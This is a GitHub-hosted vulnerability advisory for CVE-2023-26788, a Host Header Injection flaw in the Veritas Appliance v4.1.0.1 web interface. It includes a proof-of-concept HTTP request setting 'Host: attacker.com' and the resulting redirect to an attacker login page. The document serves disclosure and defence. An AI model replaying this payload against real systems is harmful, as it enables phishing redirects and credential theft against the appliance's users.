Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Veritas-Technologies/Veritas Appliance v4.1.0.1/HHI/HHI_CVE-2023-26788.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
55 lines (36 sloc)
1.96 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Host Header Injection (HHI) Attack - CVE-2023-26788 | |
| --------------------------------------------------- | |
| Version: Veritas Appliance v4.1.0.1 | |
| Type: Unauthenticated Remote attack | |
| We have identified that the "Veritas Appliance v4.1.0.1" web interface is affected by Host Header Injection attacks. HTTP host header can be manipulated and cause the application to behave in unexpected ways. Any changes made to the header would just cause the request to be sent to a completely different Domain/IP address. This is due to that the server implicitly trusts the Host header, and fails to validate or escape it properly. | |
| An attacker would be able to tamper the Host Header value during HTTP request interception (MiTM attack), and then the attacker’s domain will be added in the web page code for redirection, thus forcing the victim’s web browser to redirect to the attacker's domain/malicious web page. This would result in expanding the potential to further attacks and malicious actions. | |
| Below, evidence is provided. | |
| Request: | |
| GET / HTTP/1.1 | |
| Host: attacker.com | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 | |
| Accept: */* | |
| Accept-Language: en-US,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Content-Length: 0 | |
| Origin: https://172.16.4.100 | |
| Connection: close | |
| Sec-Fetch-Dest: empty | |
| Sec-Fetch-Mode: cors | |
| Sec-Fetch-Site: same-origin | |
| Response: | |
| HTTP/1.0 302 Redirect | |
| Server: GoAhead-Webs | |
| Date: Thu Jun 7 11:45:03 2018 | |
| Cache-Control: no-cache, no-store, must-revalidate,private | |
| Pragma: no-cache | |
| Expires: 0 | |
| Content-Type: text/html | |
| X-Frame-Options: sameorigin | |
| X-XSS-Protection: 1; mode=block | |
| X-Content-Type-Options: nosniff | |
| Location: https://attacker.com/login.asp | |
| <html><head></head><body> | |
| This document has moved to a new <a href="https://attacker.com/login.asp">location</a>. | |
| Please update your documents to reflect the new location. | |
| </body></html> | |